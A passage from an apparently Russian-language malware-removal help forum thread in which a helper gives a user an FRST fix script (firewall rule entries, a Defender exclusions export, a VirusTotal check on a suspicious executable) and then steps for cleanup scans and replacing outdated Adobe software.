FirewallRules: [{DAD5B0D8-A242-4218-8EF7-0543FDCB27F8}] => (Block) LPort=445
FirewallRules: [{2617E527-AA0C-4EC5-82C8-896BE1971541}] => (Block) LPort=139
FirewallRules: [{8EBD1686-6139-414F-A293-28C8ECC5A265}] => (Block) LPort=139
FirewallRules: [{25F5CF92-99FA-4E97-8A10-75ECD8003951}] => (Block) LPort=445
FirewallRules: [{C939DD1F-D195-43F0-86E4-9E94E6C22E5D}] => (Block) LPort=445
FirewallRules: [{0B3B15BE-C492-4432-8B4B-F540ECF5F677}] => (Block) LPort=139
FirewallRules: [{21BBD363-8DA0-4799-A4E0-A7A3971512FA}] => (Block) LPort=139
FirewallRules: [{3BDC4CEB-D90C-4D29-A061-8652704C09AE}] => (Block) LPort=445
FirewallRules: [{766D920F-6D4A-4807-94AE-37E7C57644B9}] => (Block) LPort=445
FirewallRules: [{3FD53E9C-8781-4309-8C61-58BF8202A0D7}] => (Block) LPort=139
FirewallRules: [{40B1FB7E-4BFA-4C97-80B3-FAEAACCCA8B0}] => (Block) LPort=445
FirewallRules: [{F297BCA5-8E0F-40AA-B0FE-0051E993DCEE}] => (Block) LPort=139
FirewallRules: [{DC98D39F-DC11-4EBF-A80E-9827CAD7CE0D}] => (Block) LPort=445
FirewallRules: [{72EBF853-AAA3-4794-AF4B-BE30CE7BCD4B}] => (Block) LPort=139
FirewallRules: [{58046640-E355-4BCA-8EE6-AD0F1CFD7F69}] => (Block) LPort=445
FirewallRules: [{77468943-B1CD-4EAE-8E70-45F48C277643}] => (Block) LPort=139
FirewallRules: [{9B890834-0886-4988-8C31-0CF12CA9A04C}] => (Block) LPort=445
FirewallRules: [{3CACF5A9-8B76-4F6E-A852-79A01BE4FF58}] => (Block) LPort=139
FirewallRules: [{927A2811-9165-44EE-BC8F-CEE9E39491E9}] => (Block) LPort=139
FirewallRules: [{838FA8C4-BA1D-439A-A70D-4681A7681BBC}] => (Block) LPort=445
FirewallRules: [{E5C8340E-22A8-4E3F-971F-5D8A43583A67}] => (Block) LPort=445
FirewallRules: [{2AB0D53A-0752-41E8-9DB8-1EF49DCC5262}] => (Block) LPort=139
FirewallRules: [{767660AA-9579-4C03-B290-EF6194E902E9}] => (Block) LPort=445
FirewallRules: [{42D9C6AF-2DF9-4AF0-8C97-0E13A80B9A92}] => (Block) LPort=139
FirewallRules: [{34665F64-BDE9-434F-9AF3-CAF6827F84BE}] => (Block) LPort=445
FirewallRules: [{D318002E-B3FD-450E-AE46-AF0E33658CD1}] => (Block) LPort=139
FirewallRules: [{5A348483-13BE-4A51-A951-4CBA03EF355B}] => (Block) LPort=139
FirewallRules: [{33186D93-7EB5-4A94-9520-557BB2317F29}] => (Block) LPort=445
FirewallRules: [{39F49720-B9B7-4836-A138-AE71E7A710D1}] => (Block) LPort=445
FirewallRules: [{8B98CF15-17A8-4CC4-A1DB-1DA2FAF59775}] => (Block) LPort=139
FirewallRules: [{4B66FA9E-824F-4B43-A1E5-980A55626826}] => (Block) LPort=139
FirewallRules: [{DABD29F6-6060-4D38-B2E9-983AF300662D}] => (Block) LPort=445
FirewallRules: [{147EE8C7-815C-4E08-9AC9-F7CF909D61A9}] => (Block) LPort=445
FirewallRules: [{39D39C43-CC29-4DD0-A6D3-231805DF8473}] => (Block) LPort=139
FirewallRules: [{9B095D2C-CE0F-4241-9EE1-8E3EFEFB1344}] => (Block) LPort=445
FirewallRules: [{BB301F0E-0A04-4E87-857E-EAA441AB8813}] => (Block) LPort=139
FirewallRules: [{3E9781CD-1BFD-4EE4-A3AA-6606253633CE}] => (Block) LPort=139
FirewallRules: [{248EBCEE-8036-4562-93E4-C0E2285D4018}] => (Block) LPort=445
FirewallRules: [{F733278B-2B31-4998-B715-04710E41845C}] => (Block) LPort=445
FirewallRules: [{60001A5C-A733-47AF-9576-920274A283FF}] => (Block) LPort=139
FirewallRules: [{1F3C74A5-EAF7-42F6-9343-7421FE963107}] => (Block) LPort=139
FirewallRules: [{FA3ED540-F7B6-4EE0-9549-0BEF7424C296}] => (Block) LPort=445
FirewallRules: [{5F6F5F47-C3CF-4BA0-BA4C-170FC1B19A7D}] => (Block) LPort=445
FirewallRules: [{379F0FEB-7B2B-4BD8-AA7D-156BC4A3B8A7}] => (Block) LPort=139
FirewallRules: [{AC4858B1-C16B-419A-B9AF-83264EF57DD9}] => (Block) LPort=139
FirewallRules: [{87E25317-0863-4C93-8AD7-4EAF0CC43AD4}] => (Block) LPort=445
FirewallRules: [{D2B80767-0D00-4E33-8F60-20C2AC2664B7}] => (Block) LPort=445
FirewallRules: [{BFD51E96-C82A-46C2-93B9-C84EB293AA63}] => (Block) LPort=139
FirewallRules: [{F9CE8EF2-19DE-4AB7-BAA3-353B9C38BFBD}] => (Block) LPort=445
FirewallRules: [{ED3AC940-E513-47B0-B238-772350A6153C}] => (Block) LPort=139
FirewallRules: [{59A66F6F-463C-4E4D-9E6F-AC27D4AF945A}] => (Block) LPort=445
FirewallRules: [{D77E1EA9-5B72-49B5-89BD-8B3C584A5BE7}] => (Block) LPort=139
FirewallRules: [{04E48054-4392-4283-8050-0829AA5DF5AB}] => (Block) LPort=445
FirewallRules: [{86C88A73-6A64-4242-9160-3260C8C9A818}] => (Block) LPort=139
FirewallRules: [{9C2315BA-CB81-4F04-9B28-75572B63990A}] => (Block) LPort=445
FirewallRules: [{FE21507F-A8A8-4EE4-B331-364E1DEBBC66}] => (Block) LPort=139
FirewallRules: [{84B5628F-D6DC-47F4-9BD2-45AEF42589A7}] => (Block) LPort=445
FirewallRules: [{B7EEAF30-9F39-41DB-B59D-6F9579CF3ABC}] => (Block) LPort=139
FirewallRules: [{CB336C4A-F67D-43C0-BA65-D70078FD7D9D}] => (Block) LPort=445
FirewallRules: [{0F950DB6-B005-4EE3-A311-52BFC64BEBFD}] => (Block) LPort=139
FirewallRules: [{424DCF0B-B573-4836-9DFA-7886B1D3ED20}] => (Block) LPort=139
FirewallRules: [{8C39C34A-D57E-4B1C-84A2-032248CE41FA}] => (Block) LPort=445
FirewallRules: [{0B92F49B-D9D7-4608-862C-7A5693F56FC1}] => (Block) LPort=445
FirewallRules: [{47F2F948-DB2A-49E7-B057-9E64E65B6B83}] => (Block) LPort=139
FirewallRules: [{E50BC868-D752-43D0-8E82-FE8B66E8711A}] => (Block) LPort=139
FirewallRules: [{27898A66-42D0-41F7-AC6B-A810D910D334}] => (Block) LPort=445
FirewallRules: [{22C1D235-EAA6-482D-98A7-8DA55A67A4E1}] => (Block) LPort=445
FirewallRules: [{162C2AF6-F852-4839-B7F4-B2A0D4C0A5D8}] => (Block) LPort=139
FirewallRules: [{0AD11CF1-22ED-4EA1-95F5-63800F54CB77}] => (Block) LPort=445
FirewallRules: [{0400429A-8B67-4EBC-9F64-45EFD65D43F8}] => (Block) LPort=139
FirewallRules: [{8E2B6EC8-7BCC-483B-A6CD-5C5A822ADADA}] => (Block) LPort=445
FirewallRules: [{443F0DDD-8B73-4325-9E1E-866A3BB95241}] => (Block) LPort=139
FirewallRules: [{9DD6027A-8D69-44CA-86F9-E77C1F63483D}] => (Block) LPort=445
FirewallRules: [{86A2A479-6E08-427D-8995-A8091B863607}] => (Block) LPort=139
FirewallRules: [{2F599213-6FFD-4A16-9F2B-25942C893EEC}] => (Block) LPort=445
FirewallRules: [{D5D622E2-0070-4DE1-9617-7AF6F18AF50C}] => (Block) LPort=139
FirewallRules: [{1C6AF744-9B5C-4E23-B1AC-C14D8EEF53C7}] => (Block) LPort=445
FirewallRules: [{1EEADA03-8ACC-4D23-8156-E81E8716F09B}] => (Block) LPort=139
FirewallRules: [{9612A438-87CF-494D-981F-0CC0811633EA}] => (Block) LPort=445
FirewallRules: [{C46C6A8A-7108-4C93-85C3-6DA4BE77D248}] => (Block) LPort=139
FirewallRules: [{138EF67F-9253-46EC-B2C8-10EE6058AC76}] => (Block) LPort=445
FirewallRules: [{5B4C505A-B041-4A80-8178-1A8CDA536A85}] => (Block) LPort=139
FirewallRules: [{68BCDF59-41A3-41E7-A27C-A9FCBAF66A8F}] => (Block) LPort=445
FirewallRules: [{D6443418-B89E-44CE-8983-EB41210E4C3A}] => (Block) LPort=139
FirewallRules: [{2F6C4540-D1E1-42A7-B3BA-7ACDA09C03ED}] => (Block) LPort=445
FirewallRules: [{EC63B4D1-BC64-4183-BA04-334708881253}] => (Block) LPort=139
FirewallRules: [{46EFC63D-4F0B-4687-A7F3-932165607F8C}] => (Block) LPort=445
FirewallRules: [{9E20D785-58C5-4CF7-86E1-FE4C1278F5B1}] => (Block) LPort=139
FirewallRules: [{D5E1A64B-60C4-40D7-AE41-0F6F2F770DF6}] => (Block) LPort=445
FirewallRules: [{82153F17-D7AF-440C-8AEB-E40FF67B0A3D}] => (Allow) C:\Users\user\AppData\Roaming\Zoom\bin\Zoom.exe => Нет файла
FirewallRules: [{5A914F6A-C45C-45D7-8A87-407A249F0FC2}] => (Allow) C:\Users\user\AppData\Roaming\Zoom\bin\airhost.exe => Нет файла
FirewallRules: [{EC1422BD-ADFA-46B6-BADA-DB2728472518}] => (Allow) C:\Program Files (x86)\360\Total Security\softmgr\360InstantSetup.exe (QIHU 360 SOFTWARE CO. LIMITED -> Qihoo 360 Technology Co. Ltd.)
FirewallRules: [{C791772A-8254-441B-8C95-E9D0F61B141F}] => (Allow) C:\Program Files (x86)\360\Total Security\softmgr\360InstantSetup.exe (QIHU 360 SOFTWARE CO. LIMITED -> Qihoo 360 Technology Co. Ltd.)
FirewallRules: [{1F4C8B74-812E-4C2D-A9A8-CAC893E4BD98}] => (Block) LPort=445
FirewallRules: [{8AB06017-C353-4CDE-A0D7-A8A132834847}] => (Block) LPort=139
S1 MpKslaeeb4da8; \??\C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{7C4F1002-0B34-47A0-9679-DD65B6FA085C}\MpKslaeeb4da8.sys [X]
Virustotal: C:\Users\user\Desktop\Помощник\Project2 (1).exe
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:
End::[/CODE]Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Исправить[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Удалите остатки Avast! утилитой [URL="http://www.avast.ru/uninstall-utility"]aswclear.exe [/URL] в [URL="http://virusinfo.info/showthread.php?t=9279"]безопасном режиме[/URL].

Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].

Приложите этот файл к своему следующему сообщению.
26.08.2021, 00:28
lexperience

Вложений: 2

[ATTACH=CONFIG]685662[/ATTACH]
[ATTACH=CONFIG]685663[/ATTACH]
26.08.2021, 07:50
Vvvyg

[QUOTE]Adobe Flash Player 24 NPAPI v.24.0.0.221 [color=red][b]Данная программа больше не поддерживается разработчиком.[/b][/color] Рекомендуется деинсталлировать ее.
Adobe Reader 9.4.0 - Russian v.9.4.0 [color=red][b]Данная программа больше не поддерживается разработчиком.[/b][/color] Рекомендуется деинсталлировать ее, скачать и установить [b][url=http://get.adobe.com/ru/reader/otherversions/]Adobe Acrobat Reader DC[/url][/b].[/QUOTE]Выполните эти рекомендации.

Проблема решена?

Сделайте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]Malwarebytes AdwCleaner[/URL].
26.08.2021, 20:25
lexperience

Вложений: 1

Какие рекомендации? У меня вот что отображается [ATTACH=CONFIG]685667[/ATTACH]
26.08.2021, 21:43
Vvvyg

Так это и есть рекомендации. Что-то не ясно?
26.08.2021, 22:16
lexperience

Все понял, я думал просто что должно было что-то отобразится на странице, но не может так как у меня нет флеш-плеера)

То есть мне просто удалить флеш поставить риадер и сделать лог и все?
27.08.2021, 07:28
Vvvyg

Да. И Adobe Reader 9.4.0 предварительно удалите.

Троян не появлялся больше?